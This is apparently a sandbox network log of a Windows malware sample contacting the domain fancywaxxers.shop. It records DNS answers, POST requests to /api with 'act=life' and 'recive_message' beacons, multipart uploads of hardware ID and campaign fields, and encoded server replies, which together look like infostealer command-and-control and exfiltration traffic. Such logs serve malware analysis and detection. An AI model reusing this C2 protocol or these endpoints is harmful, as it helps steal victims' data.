Jan 1, 2025 22:04:57.135765076 CET	1.1.1.1	192.168.2.6	0x575	No error (0)	fancywaxxers.shop	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 1, 2025 22:04:57.135765076 CET	1.1.1.1	192.168.2.6	0x575	No error (0)	fancywaxxers.shop	104.21.64.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fancywaxxers.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49712	104.21.32.1	443	3960	C:\Users\user\Desktop\UhsjR3ZFTD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 21:04:57 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fancywaxxers.shop
2025-01-01 21:04:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-01 21:04:58 UTC	1126	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 21:04:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7c5splgj34r03uav0v9jvmvb04; expires=Sun, 27 Apr 2025 14:51:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FirWcVh05PZWNM0cm9sQOmiCuP7wL9InIcd5HLUw2BZqgmJoOber1Xzb%2Bi%2FBY00mKzzBVFRy6o1hau2vITzemUx9ErIqnIqFfVi1Mv02GUGYs2mbRevSXmZCYpR1fjTicaIYjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb576f90f234344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1669&rtt_var=657&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1627647&cwnd=47&unsent_bytes=0&cid=7d81c81cc2696be1&ts=549&x=0"
2025-01-01 21:04:58 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-01 21:04:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49713	104.21.32.1	443	3960	C:\Users\user\Desktop\UhsjR3ZFTD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 21:04:58 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: fancywaxxers.shop
2025-01-01 21:04:58 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=Zv86PG--UzeRR&j=
2025-01-01 21:04:59 UTC	1127	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 21:04:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=12ntfjilshbv6lohajqs01tv1h; expires=Sun, 27 Apr 2025 14:51:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5Y44E%2Fd82MVoKPz9nLf6dmXzs25XtD6fB16i8WiYCOOMFLPAQ5xMeqE3QwA68bDN0kWhM4XJLmY6Mi2dm1PoexDqhcUakQNbzN3M5wnKX8z%2B9M60620C2116WmNoBXSKc6BIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb576ff49b2c327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1603&rtt_var=612&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=1772920&cwnd=189&unsent_bytes=0&cid=e0133bb2feb49e8f&ts=482&x=0"
2025-01-01 21:04:59 UTC	242	IN	Data Raw: 34 39 39 34 0d 0a 6c 61 75 46 4d 42 56 45 79 4c 39 6e 4a 7a 39 62 52 38 41 78 4f 4e 68 41 42 79 76 71 63 75 47 47 30 6e 35 2f 63 54 53 6e 47 42 58 75 69 66 4d 53 4c 33 44 6b 6e 52 52 43 48 57 45 7a 73 6b 52 64 39 47 4a 6d 54 38 68 49 68 2b 65 2b 44 52 70 64 46 74 46 31 4e 36 2f 4e 35 46 78 6d 49 65 53 64 41 6c 38 64 59 52 79 37 45 31 32 32 59 6a 30 4a 6a 78 69 44 35 37 34 63 48 68 70 62 31 33 52 32 2f 63 66 69 57 48 41 6e 72 4e 34 4c 53 6c 6f 2b 49 71 46 62 56 72 45 74 62 30 62 49 58 73 50 6a 71 46 78 46 55 33 6e 43 62 48 54 59 79 76 5a 62 4e 7a 6e 6b 78 45 56 43 55 58 6c 39 34 6c 42 64 75 69 78 68 54 34 45 61 69 65 36 32 48 52 73 62 52 4d 35 2b 66 66 33 4a 34 56 6c 36 4c 72 6a 54 41 55 31 52 4f 43 69 68 45 78 54 36 Data Ascii: 4994lauFMBVEyL9nJz9bR8AxONhAByvqcuGG0n5/cTSnGBXuifMSL3DknRRCHWEzskRd9GJmT8hIh+e+DRpdFtF1N6/N5FxmIeSdAl8dYRy7E122Yj0JjxiD574cHhpb13R2/cfiWHAnrN4LSlo+IqFbVrEtb0bIXsPjqFxFU3nCbHTYyvZbNznkxEVCUXl94lBduixhT4Eaie62HRsbRM5+ff3J4Vl6LrjTAU1ROCihExT6
2025-01-01 21:04:59 UTC	1369	IN	Data Raw: 4a 58 30 4a 30 46 44 51 31 72 4d 4e 44 41 5a 62 31 58 77 33 36 49 66 2b 45 6e 41 71 36 6f 56 46 54 56 45 33 49 4b 46 63 58 62 73 69 64 30 61 49 45 34 76 73 74 42 59 53 48 46 6e 4c 63 48 44 2f 77 4f 42 64 63 43 36 73 30 67 59 46 45 33 6b 69 75 68 4d 43 2b 67 4a 31 53 6f 73 45 6a 76 58 77 41 31 4d 4b 46 73 4a 32 4e 36 2b 4a 34 56 78 32 4b 36 72 50 44 55 35 57 50 44 65 70 57 6c 65 33 49 6d 68 44 68 78 4f 44 34 37 6f 57 45 68 6c 53 79 48 64 78 39 38 6d 6e 48 44 63 68 73 70 31 64 42 58 34 38 4e 61 56 66 54 50 67 59 4a 56 62 47 43 63 50 6a 76 46 78 46 55 31 37 41 65 58 54 38 78 75 52 61 66 44 53 71 7a 77 4e 49 57 43 73 6a 70 31 31 51 75 54 42 76 52 34 34 54 69 75 2b 35 47 52 6f 58 46 6f 73 36 63 4f 2b 4a 76 78 4a 57 4b 36 48 52 44 31 4a 64 65 54 72 73 53 68 71 Data Ascii: JX0J0FDQ1rMNDAZb1Xw36If+EnAq6oVFTVE3IKFcXbsid0aIE4vstBYSHFnLcHD/wOBdcC6s0gYFE3kiuhMC+gJ1SosEjvXwA1MKFsJ2N6+J4Vx2K6rPDU5WPDepWle3ImhDhxOD47oWEhlSyHdx98mnHDchsp1dBX48NaVfTPgYJVbGCcPjvFxFU17AeXT8xuRafDSqzwNIWCsjp11QuTBvR44Tiu+5GRoXFos6cO+JvxJWK6HRD1JdeTrsShq
2025-01-01 21:04:59 UTC	1369	IN	Data Raw: 34 34 66 6a 75 6a 77 55 6c 30 55 54 6f 55 69 4e 39 33 4b 38 31 46 39 5a 4a 2f 65 43 30 74 61 4c 32 57 39 48 55 50 36 4a 57 6b 4a 30 46 43 4f 35 62 67 61 44 78 78 62 78 6e 52 35 2b 4d 7a 6f 57 6e 63 6d 70 39 67 42 54 6c 59 36 4b 4b 5a 42 55 4c 6f 71 59 45 69 43 47 73 4f 71 38 42 73 46 55 77 36 46 53 32 44 38 69 39 4a 52 65 53 69 74 79 30 56 61 45 79 42 6c 70 56 38 61 34 6d 4a 6f 51 59 30 56 6a 4f 57 36 45 68 67 5a 57 73 31 30 64 4f 58 47 34 31 4a 37 4c 71 44 51 43 30 46 56 4d 43 36 70 56 56 71 37 4b 43 55 48 79 42 65 62 70 4f 68 63 4b 52 52 61 79 48 55 31 77 73 72 70 58 48 41 77 36 73 4a 4c 58 42 30 2b 4b 65 49 4c 47 72 59 72 5a 55 4b 43 46 49 50 6a 76 52 6b 65 46 46 58 49 66 58 33 35 7a 75 4e 65 66 69 75 73 33 51 4a 42 57 43 73 67 71 31 39 57 2b 6d 77 6c Data Ascii: 44fjujwUl0UToUiN93K81F9ZJ/eC0taL2W9HUP6JWkJ0FCO5bgaDxxbxnR5+MzoWncmp9gBTlY6KKZBULoqYEiCGsOq8BsFUw6FS2D8i9JReSity0VaEyBlpV8a4mJoQY0VjOW6EhgZWs10dOXG41J7LqDQC0FVMC6pVVq7KCUHyBebpOhcKRRayHU1wsrpXHAw6sJLXB0+KeILGrYrZUKCFIPjvRkeFFXIfX35zuNefius3QJBWCsgq19W+mwl
2025-01-01 21:04:59 UTC	1369	IN	Data Raw: 33 39 38 42 73 52 55 77 36 46 63 33 37 6c 78 2b 6c 62 65 69 43 69 32 67 74 49 56 6a 38 75 70 56 52 63 74 79 70 6f 54 49 73 52 68 2b 36 69 48 78 59 5a 57 38 38 36 4f 62 66 4f 2f 78 49 76 5a 6f 33 52 4c 46 56 47 4b 7a 50 69 54 42 53 6a 59 6d 4a 46 79 45 6a 44 35 37 38 56 45 68 74 65 79 6e 56 7a 2b 63 2f 68 58 33 49 70 6f 4d 38 4e 53 31 41 79 4b 71 6c 42 57 72 63 6d 61 55 32 41 47 34 6d 6b 2f 6c 77 61 43 78 61 64 4f 6b 4c 36 78 75 64 52 59 57 61 31 6b 78 77 46 57 6a 56 6c 2b 68 4e 57 74 43 4a 71 52 59 51 62 69 2b 57 38 45 68 6f 57 58 38 31 79 5a 66 62 4e 37 31 4e 35 4b 61 76 5a 41 45 42 5a 50 69 47 6b 58 42 72 30 59 6d 4a 52 79 45 6a 44 79 35 63 70 58 7a 4a 73 68 57 55 35 37 6f 6e 67 58 6a 64 2b 36 74 45 47 53 56 55 32 49 36 74 66 55 4c 4d 70 61 55 4b 4d 48 Data Ascii: 398BsRUw6Fc37lx+lbeiCi2gtIVj8upVRctypoTIsRh+6iHxYZW886ObfO/xIvZo3RLFVGKzPiTBSjYmJFyEjD578VEhteynVz+c/hX3IpoM8NS1AyKqlBWrcmaU2AG4mk/lwaCxadOkL6xudRYWa1kxwFWjVl+hNWtCJqRYQbi+W8EhoWX81yZfbN71N5KavZAEBZPiGkXBr0YmJRyEjDy5cpXzJshWU57ongXjd+6tEGSVU2I6tfULMpaUKMH
2025-01-01 21:04:59 UTC	1369	IN	Data Raw: 54 48 42 4a 51 31 33 31 2b 35 63 66 71 58 58 38 75 6f 39 77 42 51 46 41 2f 4b 61 68 53 58 62 51 73 62 51 6e 47 55 49 54 38 38 45 52 64 4d 6b 62 65 61 47 48 36 36 4f 70 64 4e 7a 6e 6b 78 45 56 43 55 58 6c 39 34 6c 70 49 76 69 39 33 51 49 38 65 6a 4f 65 69 48 52 41 59 52 4d 4a 31 63 2f 44 46 34 56 31 78 4a 36 2f 58 43 55 4a 59 4d 69 71 75 45 78 54 36 4a 58 30 4a 30 46 43 74 37 36 4d 4c 48 68 31 64 30 32 45 33 36 49 66 2b 45 6e 41 71 36 6f 56 46 52 6c 59 79 49 61 4a 66 57 72 34 76 5a 56 75 48 46 34 54 74 75 77 34 58 46 46 48 4f 63 6e 7a 34 7a 2f 56 65 65 54 53 76 7a 78 63 46 45 33 6b 69 75 68 4d 43 2b 68 52 69 57 5a 67 54 77 64 57 6d 48 77 73 59 57 38 6b 36 61 4c 6e 51 70 31 56 37 5a 76 4b 64 41 30 70 55 4f 69 71 6a 57 6c 61 33 4a 32 78 4d 69 52 61 48 37 72 Data Ascii: THBJQ131+5cfqXX8uo9wBQFA/KahSXbQsbQnGUIT88ERdMkbeaGH66OpdNznkxEVCUXl94lpIvi93QI8ejOeiHRAYRMJ1c/DF4V1xJ6/XCUJYMiquExT6JX0J0FCt76MLHh1d02E36If+EnAq6oVFRlYyIaJfWr4vZVuHF4Ttuw4XFFHOcnz4z/VeeTSvzxcFE3kiuhMC+hRiWZgTwdWmHwsYW8k6aLnQp1V7ZvKdA0pUOiqjWla3J2xMiRaH7r
2025-01-01 21:04:59 UTC	1369	IN	Data Raw: 46 74 6f 30 62 72 66 4f 36 78 49 76 5a 71 6e 61 42 6b 52 58 4d 43 6d 74 56 46 36 6f 4b 47 4a 62 69 52 47 49 36 62 77 63 45 42 35 63 78 48 4e 36 2b 38 54 67 56 58 67 6a 36 70 4e 46 51 6b 56 35 66 65 4a 79 56 37 45 75 50 68 50 49 44 38 33 39 38 42 73 52 55 77 36 46 65 6e 33 79 77 2b 70 52 65 43 57 34 33 41 4e 58 58 54 51 76 73 46 6c 52 76 79 39 6f 52 49 73 57 68 65 2b 38 44 68 51 54 56 63 34 36 4f 62 66 4f 2f 78 49 76 5a 6f 6e 4b 45 30 39 61 4e 54 4f 70 55 6c 6d 73 4c 33 55 4a 78 6c 43 53 34 36 46 63 52 51 56 47 30 6e 31 6f 75 64 43 6e 56 58 74 6d 38 70 30 44 54 46 73 2b 49 36 78 42 58 37 77 74 61 6b 43 42 46 49 76 6e 73 42 67 5a 46 46 50 47 64 6e 7a 77 79 75 68 57 66 69 69 6a 30 6b 55 4c 48 54 34 39 34 67 73 61 6d 7a 6c 6d 52 59 56 51 6e 4b 71 70 58 42 6f Data Ascii: Fto0brfO6xIvZqnaBkRXMCmtVF6oKGJbiRGI6bwcEB5cxHN6+8TgVXgj6pNFQkV5feJyV7EuPhPID8398BsRUw6Fen3yw+pReCW43ANXXTQvsFlRvy9oRIsWhe+8DhQTVc46ObfO/xIvZonKE09aNTOpUlmsL3UJxlCS46FcRQVG0n1oudCnVXtm8p0DTFs+I6xBX7wtakCBFIvnsBgZFFPGdnzwyuhWfiij0kULHT494gsamzlmRYVQnKqpXBo
2025-01-01 21:04:59 UTC	1369	IN	Data Raw: 6a 65 76 69 63 64 5a 59 53 4f 74 79 30 64 77 58 6a 63 72 70 55 55 61 70 52 30 72 43 59 63 4b 77 37 79 4a 42 56 30 55 57 6f 55 69 4e 2b 4c 4f 35 31 56 74 4d 4b 33 52 46 45 35 51 4e 51 65 74 56 45 79 35 4c 57 5a 59 67 56 79 49 36 66 42 53 58 52 52 4f 68 53 49 33 32 4d 37 78 55 56 67 6c 75 39 52 46 43 78 30 2b 4d 2b 49 4c 47 6f 52 69 64 30 71 59 45 34 7a 31 6a 6c 78 46 43 6d 69 46 63 57 48 77 32 65 52 45 66 43 75 6d 7a 44 73 46 42 57 31 33 38 41 45 49 36 44 30 6c 56 72 64 65 77 2b 58 77 52 43 51 4b 46 74 4d 36 4c 36 57 48 70 30 41 33 66 75 71 61 42 6c 64 50 50 79 61 30 55 42 32 45 48 45 4a 66 67 68 65 54 34 36 63 54 58 56 30 57 79 6a 6f 76 7a 6f 6e 75 56 57 77 33 76 4e 41 56 51 68 30 47 61 2b 4a 4c 47 75 4a 69 55 45 71 47 48 6f 54 79 6f 56 45 36 42 56 7a 43 Data Ascii: jevicdZYSOty0dwXjcrpUUapR0rCYcKw7yJBV0UWoUiN+LO51VtMK3RFE5QNQetVEy5LWZYgVyI6fBSXRROhSI32M7xUVglu9RFCx0+M+ILGoRid0qYE4z1jlxFCmiFcWHw2eREfCumzDsFBW138AEI6D0lVrdew+XwRCQKFtM6L6WHp0A3fuqaBldPPya0UB2EHEJfgheT46cTXV0WyjovzonuVWw3vNAVQh0Ga+JLGuJiUEqGHoTyoVE6BVzC
2025-01-01 21:04:59 UTC	1369	IN	Data Raw: 57 6e 48 44 63 7a 6f 64 45 44 53 45 68 32 4e 4c 52 51 54 4c 31 75 62 56 69 46 48 4d 50 62 2f 6c 77 46 55 77 36 46 54 33 54 35 78 2b 42 45 5a 6d 75 4b 31 67 6c 47 55 54 67 69 34 68 30 61 76 47 49 39 47 73 5a 51 68 2f 58 77 52 45 31 42 44 5a 41 70 49 4b 65 62 2b 42 78 75 5a 72 79 64 58 52 63 54 65 54 66 69 43 78 72 39 49 58 64 62 6a 68 4f 56 35 2f 63 69 49 78 4a 62 79 6a 5a 35 2f 4d 6e 67 51 6d 45 39 35 74 55 47 58 30 63 48 47 34 6c 66 58 4c 30 34 59 6b 2b 75 4d 4d 4f 71 38 42 4e 64 53 32 2b 46 4d 6a 66 49 68 36 64 4b 4e 33 37 71 36 41 5a 4c 55 7a 34 7a 73 78 35 79 6d 52 68 66 43 36 51 58 6c 71 61 45 47 77 30 43 58 63 68 32 4e 37 6d 4a 34 52 49 76 64 75 53 64 41 56 51 64 59 58 58 77 43 41 2f 70 64 54 55 62 6c 31 36 61 70 4b 5a 63 52 55 45 59 68 57 67 33 72 Data Ascii: WnHDczodEDSEh2NLRQTL1ubViFHMPb/lwFUw6FT3T5x+BEZmuK1glGUTgi4h0avGI9GsZQh/XwRE1BDZApIKeb+BxuZrydXRcTeTfiCxr9IXdbjhOV5/ciIxJbyjZ5/MngQmE95tUGX0cHG4lfXL04Yk+uMMOq8BNdS2+FMjfIh6dKN37q6AZLUz4zsx5ymRhfC6QXlqaEGw0CXch2N7mJ4RIvduSdAVQdYXXwCA/pdTUbl16apKZcRUEYhWg3r
2025-01-01 21:04:59 UTC	1369	IN	Data Raw: 76 64 65 53 64 46 77 55 46 65 57 4b 73 58 6c 75 35 4c 47 5a 62 6d 68 61 41 38 72 4e 62 49 79 31 7a 79 48 64 79 2b 63 37 5a 62 46 59 73 75 74 41 4b 51 68 38 5a 49 72 52 51 5a 49 51 56 64 45 36 59 55 71 58 6e 70 68 39 64 58 52 62 64 4f 69 2b 33 36 4f 31 43 65 69 6d 74 6e 79 56 43 53 7a 70 6c 37 42 4e 65 2b 6e 6f 6c 62 49 55 64 68 75 71 33 58 6a 77 5a 52 73 68 31 63 4c 58 70 34 45 52 30 5a 75 53 64 43 51 55 46 65 53 53 6f 51 31 65 31 4a 53 6c 4f 6b 68 66 44 71 76 41 53 58 55 73 57 78 48 42 6e 2b 73 62 67 48 6e 45 6f 70 4a 30 61 43 30 52 35 4d 2b 49 4c 43 66 52 69 64 77 6e 51 55 4d 54 6e 6f 67 34 62 45 45 44 47 50 55 6e 4a 35 50 56 56 5a 79 58 6f 37 41 68 42 53 79 77 6d 73 6c 52 6b 68 41 39 33 54 70 67 54 77 64 57 6d 48 78 30 64 55 59 55 30 4e 2b 2b 4a 76 78 Data Ascii: vdeSdFwUFeWKsXlu5LGZbmhaA8rNbIy1zyHdy+c7ZbFYsutAKQh8ZIrRQZIQVdE6YUqXnph9dXRbdOi+36O1CeimtnyVCSzpl7BNe+nolbIUdhuq3XjwZRsh1cLXp4ER0ZuSdCQUFeSSoQ1e1JSlOkhfDqvASXUsWxHBn+sbgHnEopJ0aC0R5M+ILCfRidwnQUMTnog4bEEDGPUnJ5PVVZyXo7AhBSywmslRkhA93TpgTwdWmHx0dUYU0N++Jvx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49714	104.21.32.1	443	3960	C:\Users\user\Desktop\UhsjR3ZFTD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 21:04:59 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XTEVJ4K09XD5XLU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12841 Host: fancywaxxers.shop
2025-01-01 21:04:59 UTC	12841	OUT	Data Raw: 2d 2d 58 54 45 56 4a 34 4b 30 39 58 44 35 58 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 58 54 45 56 4a 34 4b 30 39 58 44 35 58 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 54 45 56 4a 34 4b 30 39 58 44 35 58 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 0d 0a 2d 2d 58 54 45 56 4a Data Ascii: --XTEVJ4K09XD5XLUContent-Disposition: form-data; name="hwid"6EEC98F5FCD4F9CB20A4C476FD51BCB1--XTEVJ4K09XD5XLUContent-Disposition: form-data; name="pid"2--XTEVJ4K09XD5XLUContent-Disposition: form-data; name="lid"Zv86PG--UzeRR--XTEVJ
2025-01-01 21:05:00 UTC	1134	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 21:05:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0clg2ssvi9rcgp8ho8cjov002t; expires=Sun, 27 Apr 2025 14:51:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=omaI%2FyQ7gdwilJl9oGyi9%2BILF0z2hz92ZjM0BNsEsuKszdyuT%2B0y%2FAQftWefnIe0F6L0tH4Y6f2HecZ4mzryghNoPj6J9RC6qkbiI4SwvU95QFEuj5gg3kCVP7oGqbpmOENgXA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb57706fc351875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2103&min_rtt=2092&rtt_var=807&sent=7&recv=17&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13779&delivery_rate=1337608&cwnd=153&unsent_bytes=0&cid=01db28871cbfd54a&ts=576&x=0"
2025-01-01 21:05:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 21:05:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49715	104.21.32.1	443	3960	C:\Users\user\Desktop\UhsjR3ZFTD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 21:05:01 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SJ9KEQ9EX23R4F2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15087 Host: fancywaxxers.shop
2025-01-01 21:05:01 UTC	15087	OUT	Data Raw: 2d 2d 53 4a 39 4b 45 51 39 45 58 32 33 52 34 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 53 4a 39 4b 45 51 39 45 58 32 33 52 34 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 4a 39 4b 45 51 39 45 58 32 33 52 34 46 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 0d 0a 2d 2d 53 4a 39 4b 45 Data Ascii: --SJ9KEQ9EX23R4F2Content-Disposition: form-data; name="hwid"6EEC98F5FCD4F9CB20A4C476FD51BCB1--SJ9KEQ9EX23R4F2Content-Disposition: form-data; name="pid"2--SJ9KEQ9EX23R4F2Content-Disposition: form-data; name="lid"Zv86PG--UzeRR--SJ9KE
2025-01-01 21:05:01 UTC	1139	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 21:05:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m8a8t9na5kfr9b7a649ati7otj; expires=Sun, 27 Apr 2025 14:51:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DnXRq4OsX%2FX44q7NhcMPY4p06jRBNgrPIS6qbvXoFpSFufSf%2BTGcSsmPrJI5x0BCigtXXaWno%2FfhRRJ3ZOgxlp7N9q%2FCL4%2BC7J2HjZFl8O13DAv%2BKykEPVETPddlc1R7ut2YQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb5770e0835c327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1655&rtt_var=630&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2842&recv_bytes=16025&delivery_rate=1723730&cwnd=189&unsent_bytes=0&cid=b0e9fa8025633fb5&ts=495&x=0"
2025-01-01 21:05:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-01 21:05:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49717	104.21.32.1	443	3960	C:\Users\user\Desktop\UhsjR3ZFTD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 21:05:02 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XF7EXX2N03UI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19927 Host: fancywaxxers.shop
2025-01-01 21:05:02 UTC	15331	OUT	Data Raw: 2d 2d 58 46 37 45 58 58 32 4e 30 33 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 58 46 37 45 58 58 32 4e 30 33 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 46 37 45 58 58 32 4e 30 33 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 0d 0a 2d 2d 58 46 37 45 58 58 32 4e 30 33 55 49 0d 0a Data Ascii: --XF7EXX2N03UIContent-Disposition: form-data; 